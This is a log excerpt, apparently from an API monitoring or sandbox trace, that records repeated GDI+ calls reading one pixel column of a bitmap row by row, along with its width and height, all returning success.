[0138.899] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=114, color=0x17e6f4) returned 0x0
[0138.899] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.900] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.900] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=115, color=0x17e6f4) returned 0x0
[0138.900] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.900] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.900] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=116, color=0x17e6f4) returned 0x0
[0138.900] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.900] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.900] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=117, color=0x17e6f4) returned 0x0
[0138.900] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.900] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.900] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=118, color=0x17e6f4) returned 0x0
[0138.900] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.900] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.900] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=119, color=0x17e6f4) returned 0x0
[0138.901] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.901] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.901] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=120, color=0x17e6f4) returned 0x0
[0138.901] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.901] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.901] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=121, color=0x17e6f4) returned 0x0
[0138.901] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.901] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.901] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=122, color=0x17e6f4) returned 0x0
[0138.901] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.901] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.901] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=123, color=0x17e6f4) returned 0x0
[0138.901] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.901] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.901] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=124, color=0x17e6f4) returned 0x0
[0138.902] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.902] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.902] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=125, color=0x17e6f4) returned 0x0
[0138.902] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.902] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.902] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=126, color=0x17e6f4) returned 0x0
[0138.902] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.902] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.902] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=127, color=0x17e6f4) returned 0x0
[0138.902] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.902] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.902] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=128, color=0x17e6f4) returned 0x0
[0138.902] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.902] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.902] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=129, color=0x17e6f4) returned 0x0
[0138.903] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.903] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.903] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=130, color=0x17e6f4) returned 0x0
[0138.903] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.903] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.903] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=131, color=0x17e6f4) returned 0x0
[0138.903] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.903] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.903] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=132, color=0x17e6f4) returned 0x0
[0138.903] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.903] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.903] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=133, color=0x17e6f4) returned 0x0
[0138.903] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.903] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.904] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=134, color=0x17e6f4) returned 0x0
[0138.904] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.904] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.904] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=135, color=0x17e6f4) returned 0x0
[0138.904] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.904] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.904] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=136, color=0x17e6f4) returned 0x0
[0138.904] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.904] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.904] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=137, color=0x17e6f4) returned 0x0
[0138.904] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.904] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.904] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=138, color=0x17e6f4) returned 0x0
[0138.904] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.904] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.905] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=139, color=0x17e6f4) returned 0x0
[0138.905] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.905] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.905] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=140, color=0x17e6f4) returned 0x0
[0138.905] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.905] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.905] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=141, color=0x17e6f4) returned 0x0
[0138.905] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.905] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.905] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=142, color=0x17e6f4) returned 0x0
[0138.905] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.905] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.905] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=143, color=0x17e6f4) returned 0x0
[0138.905] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.905] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=144, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=145, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=146, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=147, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=148, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=149, color=0x17e6f4) returned 0x0
[0138.906] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.906] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.906] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=150, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.907] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=151, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.907] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=152, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.907] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=153, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.907] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=154, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.907] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=155, color=0x17e6f4) returned 0x0
[0138.907] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.907] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=156, color=0x17e6f4) returned 0x0
[0138.908] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.908] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=157, color=0x17e6f4) returned 0x0
[0138.908] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.908] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=158, color=0x17e6f4) returned 0x0
[0138.908] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.908] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=159, color=0x17e6f4) returned 0x0
[0138.908] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.908] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=160, color=0x17e6f4) returned 0x0
[0138.908] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.908] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.908] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=161, color=0x17e6f4) returned 0x0
[0138.909] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.909] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.909] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=162, color=0x17e6f4) returned 0x0
[0138.909] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.909] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.909] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=163, color=0x17e6f4) returned 0x0
[0138.909] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.909] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.909] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=164, color=0x17e6f4) returned 0x0
[0138.909] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.909] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.909] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=165, color=0x17e6f4) returned 0x0
[0138.910] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.910] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.910] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=166, color=0x17e6f4) returned 0x0
[0138.910] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.910] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.910] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=167, color=0x17e6f4) returned 0x0
[0138.910] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.910] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.910] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=168, color=0x17e6f4) returned 0x0
[0138.911] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.911] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.911] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=169, color=0x17e6f4) returned 0x0
[0138.911] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.911] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.911] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=170, color=0x17e6f4) returned 0x0
[0138.911] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.911] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.911] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=171, color=0x17e6f4) returned 0x0
[0138.911] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.911] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.911] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=172, color=0x17e6f4) returned 0x0
[0138.911] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.911] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.911] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=173, color=0x17e6f4) returned 0x0
[0138.912] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.912] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.912] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=174, color=0x17e6f4) returned 0x0
[0138.912] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.912] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.912] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=175, color=0x17e6f4) returned 0x0
[0138.912] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.912] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.912] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=176, color=0x17e6f4) returned 0x0
[0138.912] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.912] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.912] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=177, color=0x17e6f4) returned 0x0
[0138.912] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.912] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.913] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=178, color=0x17e6f4) returned 0x0
[0138.913] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.913] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.913] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=179, color=0x17e6f4) returned 0x0
[0138.913] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.913] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.913] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=180, color=0x17e6f4) returned 0x0
[0138.913] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.913] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.913] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=181, color=0x17e6f4) returned 0x0
[0138.913] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.913] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.913] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=182, color=0x17e6f4) returned 0x0
[0138.913] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.913] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.914] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=183, color=0x17e6f4) returned 0x0
[0138.914] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.914] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.914] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=184, color=0x17e6f4) returned 0x0
[0138.914] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.914] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.914] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=185, color=0x17e6f4) returned 0x0
[0138.914] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.914] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.914] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=186, color=0x17e6f4) returned 0x0
[0138.914] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.914] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.914] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=187, color=0x17e6f4) returned 0x0
[0138.914] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.915] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.915] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=188, color=0x17e6f4) returned 0x0
[0138.915] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.915] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.915] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=189, color=0x17e6f4) returned 0x0
[0138.915] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.915] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.915] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=190, color=0x17e6f4) returned 0x0
[0138.915] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.915] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.915] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=191, color=0x17e6f4) returned 0x0
[0138.915] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.915] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.915] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=192, color=0x17e6f4) returned 0x0
[0138.915] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.916] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.916] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=193, color=0x17e6f4) returned 0x0
[0138.916] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.916] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.916] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=194, color=0x17e6f4) returned 0x0
[0138.916] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.916] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.916] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=195, color=0x17e6f4) returned 0x0
[0138.916] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.916] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.916] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=196, color=0x17e6f4) returned 0x0
[0138.916] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.916] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.916] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=197, color=0x17e6f4) returned 0x0
[0138.916] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.917] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.917] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=198, color=0x17e6f4) returned 0x0
[0138.917] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.917] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.917] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=199, color=0x17e6f4) returned 0x0
[0138.917] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.917] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.917] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=200, color=0x17e6f4) returned 0x0
[0138.917] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.917] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.917] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=201, color=0x17e6f4) returned 0x0
[0138.917] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.917] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.917] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=202, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.918] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.918] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=203, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.918] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.918] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=204, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.918] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.918] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=205, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.918] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.918] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=206, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.918] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.918] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=207, color=0x17e6f4) returned 0x0
[0138.918] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=208, color=0x17e6f4) returned 0x0
[0138.919] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=209, color=0x17e6f4) returned 0x0
[0138.919] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=210, color=0x17e6f4) returned 0x0
[0138.919] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=211, color=0x17e6f4) returned 0x0
[0138.919] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=212, color=0x17e6f4) returned 0x0
[0138.919] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.919] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.919] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=213, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=214, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=215, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=216, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=217, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=218, color=0x17e6f4) returned 0x0
[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.920] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.920] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=219, color=0x17e6f4) returned 0x0
